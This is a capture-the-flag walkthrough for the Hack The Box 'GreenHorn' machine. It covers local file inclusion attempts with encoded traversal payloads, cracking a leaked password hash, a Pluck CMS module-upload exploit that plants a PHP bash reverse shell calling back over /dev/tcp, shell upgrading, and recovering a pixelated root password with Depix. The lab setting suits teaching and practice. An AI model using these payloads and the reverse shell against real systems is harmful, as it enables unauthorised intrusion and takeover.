
Hack the Box (HTB) - GreenHorn Walkthrough

Detailed step-by-step walkthrough for Hack The Box's GreenHorn machine, covering LFI, Pluck CMS exploitation, hardcoded credentials, and privilege escalation to root.

Hack the Box (HTB) - GreenHorn Walkthrough


Let’s start by running a AutoRecon scan against our target at

We see the following TCP ports open:

  • 22 SSH, OpenSSH 8.9p1 (Ubuntu)
  • 80 HTTP, Nginx 1.18.0 (Ubuntu)
  • 3000

Let’s start with port 80 and navigate to

Port 80

This is common on CTF challenges. Virtual hosting allows a server to host multiple websites or domains under a single IP address. This configuration requires specifying which domain you’re trying to access.

We must add the entry in our /etc/hosts file to fix this issue so we can resolve locally

sudo nano /etc/hosts


Now let’s navigate back to our page Web page

We notice the URL has a query parameter file

query parameter

Let’s try a simple LFI attack http://greenhorn.htb/?file=../../etc/passwd

Hacking Attempt

Obviously some security checks are in place, let’s head over to burp and see if we can bypass this via intruder


The LFI attack didn’t work, I tried the following:

  • URL encoding didn’t work (file=%2e%2e%2f%2e%2e%2fetc/passwd)
  • Null byte didn’t work (file=../../etc/passwd%00)
  • Double encoding (file=%252e%252e%252f%252e%252e%252fetc%252fpasswd)
  • Unicode encoding (/?file=%C0%AE%C0%AE/%C0%AE%C0%AE/etc/passwd)
  • RFI (http://greenhorn.htb/?file=
  • Various XSS attacks

Since this box is using virtual hosting (as we discoverd earlier when we couldn’t resolve greenhorn.htb) Our ferox directory scan provided by autorecon likely didn’t find anything

gobuster scan

We see admin.php, let’s investigate

Pluck Login

We immediately notice pluck 4.7.18. Whenever you see a version number like this, it’s a good idea to just searchsploit for exploits

Exploit Discored

See, easy pickings

This exploit targets a vulnerability in Pluck CMS version 4.7.18, allowing us to upload a zip file containing PHP via the module installation feature. This will obviously give is RCE

However, this exploit requires that we are able to login first

Remember that port on 3000? Let’s navigate to it


We find the Gitea application, a self-hosted service similar to GitHub that allows you to host and manage your own Git repositories


This Greenhorn repo hosted by GreenAdmin reveals the source code to our Pluck application from earlier

Source Code

I’m going to look around for some credentials


Sure enough, navigating to /data/settings/pass.php reveals what appears to be a SHA-512 hash. Let’s try to crack it using hashcat

We’ll save the hash to a file first, then run the command

hashcat -m 1700 -a 0 hash.txt /usr/share/wordlists/rockyou.txt

Cracked Hash

The hash was cracked as iloveyou1. At least someone loves me, right.

Now let’s login to Pluck

Logged into Pluck

Let’s head over to options > manage modules > install a module and upload our malicious zip file

Since we have access to the GUI interface directly. We don’t really need that script from earlier. Let’s just create our own malicious reverse shell php, zip it, and upload it

First, let’s create the PHP script

system("/bin/bash -c 'bash -i >& /dev/tcp/ 0>&1'");

This tiny php script opens a socket connection from the target server to our machine / port. It then runs a shell on the target server and redirects the input, output, and error to the socket connection (us)

Now let’s zip the file

zip pwned.php

Start the NC listener

nc -lvnp <port>

Upload the zipped php file to options > manage modules > install a module

Now curl the request

curl -I http://greenhorn.htb/data/modules/pwned_folder/pwned_file.php

We have shell access

Shell Access

We unfortunately can’t read the contents of user.txt as the file resides in the junior folder. We must escalate

Privilege Escalation

Escalation to Junior

And just like that we’re junior (Don’t reuse passwords!)

Root Escalation

Let’s upgrade this disgusting shell. Typing which python3 tells us python3 is available on this box. We’ll use the following commands to upgrade our terminal

python3 -c 'import pty; pty.spawn("/bin/bash")'

After spawning the TTY, press Ctrl+Z tp background the shell & in the local terminal, run

stty raw -echo;fg

Once back in the remoter shell, run


Set up the terminal

export TERM=xterm

Now we have a fully interactive shell with auto tab completion, command history and the ability to actually hit backspace

As always let’s run sudo -l

Sudo -l

User junior may not run sudo on greenhorn

We’ll have to try something else. Let’s get LinPeas going and see what we can find

First host the file

python3 -m http.server 9001

wget / curl the request (on the GreenHorn Box)


Now we’ll run Linpeas and check the results


We see that the gitea.service file is managed by systemd, which is the system service manager. This file specifies the executable /usr/local/bin/gitea, which is modifiable by us. By replacing this executable with a reverse shell payload, and then restarting the gitea.service, we can exploit the service’s elevated privileges to gain root access.

Changing $PATH


I went down a rabbit hole with that Linpeas. It turns out that we simply needed to take a look at our user folder a bit more


As it turns out it’s probably a good idea to check the things that are literally right under your nose 😅

Let’s put this pdf onto our attack machine so we can examine it

We’ll start up a python web server on the victim machine

python3 -m http.server 9001

Now wget the PDF from our attacker

wget'Using OpenVAS.pdf'

PDF Obtained

Let’s open the PDF now

Letter from Mr.Green

It’s a letter from Mr. Green discussing the installation of OpenVAS on the server and that would we have access in the future. The important part is the obfuscated password

This one took some time, but I discovered a tool that can help us read this pixelated password. The tool is Depix

I won’t go into detail on how the tool works, but basically the tool attempts to match pixilated blocks back to their original image by comparing it with a reference image

Download the tool from github and install any dependencies

First we’ll quickly need to extract the image from the pdf

pdfimages -all 'Using OpenVAS.pdf' image

Image Extracted

Great, now we have the raw image and can proceed with depix

Run the following command as indicated on the github page

python3 \
    -p /path/to/your/input/image.png \
    -s images/searchimages/debruinseq_notepad_Windows10_closeAndSpaced.png \
    -o /path/to/your/output.png


We have our file, let’s take a look

Root Password

We see the text sidefromsidetheothersidesidefromsidetheotherside

I was a little dumb here and spent over an hour trying to figure this out. Turns out it’s literally the root password


GG, we’ve rooted Greenhorn!

Vulnerabilities & Mitigation

URL Information DisclosureEnsure file names are sanitized and not directly exposed in the URL
Outdated CMS (Pluck)Keep all software up to date
Hardcoded CredsDo not store credentials in publicly accessible files
Weak passwordUse strong passwords
Password re-useDon’t reuse passwords

Remediation References

OWASP Top Ten: Sensitive Data Exposure

NIST SP 800-63B: Password Guidelines

This post is licensed under CC BY 4.0 by the author.